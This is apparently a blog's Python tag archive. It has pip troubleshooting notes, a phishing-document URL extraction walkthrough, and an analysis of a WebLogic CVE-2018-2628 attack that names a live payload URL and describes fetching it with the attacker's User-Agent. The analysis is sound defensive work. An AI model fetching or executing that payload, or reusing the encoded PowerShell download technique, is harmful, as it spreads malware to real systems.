Tag Archives: python

Analyzing Phishing Email – Word XML File Analysis

Recently I’ve observed a phishing mail as below:
https://www.virustotal.com/#/file/cf027dd938f1a268f45f2ea786dc538ab47f35006fb12d0b64e0867bccf789c0/detection – clean

The file seems to be clean per VT. Interestingly, on details sections, found 2 URLs on OpenXML Doc Info.

To search for these URLs, first you’ll need to rename the Word doc file to compressed zip file. E.g. sample.doc to sample.zip.

Then, extract the zip file. The URLs can be found inside file document.xml.rels (~/sample_folder/word/_rels/):

Its may look simple if you know which & where the file to be look at.

I’m thinking; what if we can search for all the URL/hyperlink in the XML files content of the Word document, without actually having to open it one-by-one.

To do that, we’ll using zipdump, re-search (together with reextra) Python script tools by Didier Stevens:

  • zipdump
  • re-search
  • reextra
  • Download the Python scripts mentioned above in one place. Then, executed this command below:

    Command above will search the content of the zip file & extract/applied regex searching for URLs.
    As you can see below, these is all the URLs that contained in the Word doc:

    Analyzing Oracle WebLogic attack

    Recently we received an alert from our WAF related to an attack towards out environment.
    Further review of the alert found that the attacker is using Oracle WebLogic RCE Deserialization Vulnerability (CVE-2018-2628).

    We observed that the attacker included some sort of PowerShell command in their request:

    Seems like the PowerShell command is using Base64 encoding for obfuscation.
    I use https://gchq.github.io/CyberChef/ to decode the Base64:

    Seems like it tried to fetch DL.php file at http://111.230.229.226/images/test/DL.php.
    Lets try grab that file:

    Hmm.. Error 404..? Is it true error?
    Or did we missing something here?

    Lets analyze the command carefully:

    We can see the attacker is assigning/using specific User-Agent when fetching the file.
    That’s why when we try to wget/curl the file directly, it failed.

    So what we have to do is we set the User-Agent exactly same when fetching the file.
    In this case, I’m using curl to fetch the file:

    Now see? Previously if the fetch the file without the User-Agent, it will failed/error 404.
    Again, we see another set off Base64 encoding here.

    But what is it?
    I’m not an expert to explain this, but TL;DR, it convert Base64 encoded string to a memory stream and executes it. I guess ¯_(ツ)_/¯

    So, to see what happen if this command executes, we can use this Python script below to decode it.
    With this script, we can basically see what are those Base64 are doing.

    Take the Base64 at above, paste it at encoded parameters as example below:

    Save the script and run the Python script as command below:

    This will save all the output from your CMD to text file for easier to ready.
    P/S : Your can rename output_DL_php.txt to any filename that you want.

    Let’s see whats inside the text file:

    As you can see, the command is doing bunch of stuff that I’m lazy to explain 😉
    Hope you enjoy reading this.

    IOCs:

    References:
    https://gist.githubusercontent.com/strazzere/5faa709a3db9e1dcf3b5/raw/42b98a918bac3725934bcfa3087ac5936d9b88d1/decrypt.py
    http://threat.tevora.com/5-minute-forensics-decoding-powershell-payloads/

    Upgrade Python packages at using pip

    As you read in the title above; to update your python packages via pip:

    for Linux/*nix:

    p/s: you may need to run as sudo. Probably.

    for Windows:

    Credit: http://stackoverflow.com/questions/2720014/upgrading-all-packages-with-pip

    Python Error – InsecurePlatformWarning

    There is one time I see this kind of error:

    If you’re on ubuntu, you may run into trouble installing pyopenssl, you’ll need these dependencies:

    You only need to install the security package extras:

    or, install them directly:

    Requests will then automatically inject pyopenssl into urllib3

    Credit: http://stackoverflow.com/questions/29134512/insecureplatformwarning-a-true-sslcontext-object-is-not-available-this-prevent

    Python Error – ImportError: No module named pkg_resources

    There is one time I tried to install some python package via pip install requirement. But I encountered some error like this:

    To fix the issue, run the setup script for setuptools:

    Yeah. it solve my problem. Probably. XD

    Credit: http://stackoverflow.com/questions/7446187/no-module-named-pkg-resources

    Installing pymongo on Ubuntu

    PyMongo distribution contains tools for interacting with MongoDB database from Python.

    Maltrieve on Mac OS X

    Maltrieve originated as a fork of mwcrawler. It retrieves malware directly from the sources as listed at a number of sites, including:

  • Malc0de
  • Malware Black List
  • Malware Domain List
  • VX Vault
  • URLqery
  • CleanMX
  • .

    If you want to install maltrieve on your Mac OS X, below is the steps to install it.

    • First, install beautifulsoup4 via pip

    • Install required dependencies via apt-get

    • Download maltrieve from github

    Done. Now you can use the Maltrieve on your Mac OS X.

    Install pip on Ubuntu 12.04

    Install pip and virtualenv for Ubuntu 10.10 Maverick and newer

    sudo apt-get install python-pip python-dev build-essential
    sudo pip install –upgrade pip
    sudo pip install –upgrade virtualenv

    For older versions of Ubuntu
    Install Easy Install

    sudo apt-get install python-setuptools python-dev build-essential

    Install pip

    sudo easy_install pip

    Install virtualenv

    sudo pip install –upgrade virtualenv

     I advice you to reboot your server first after installing python-pip package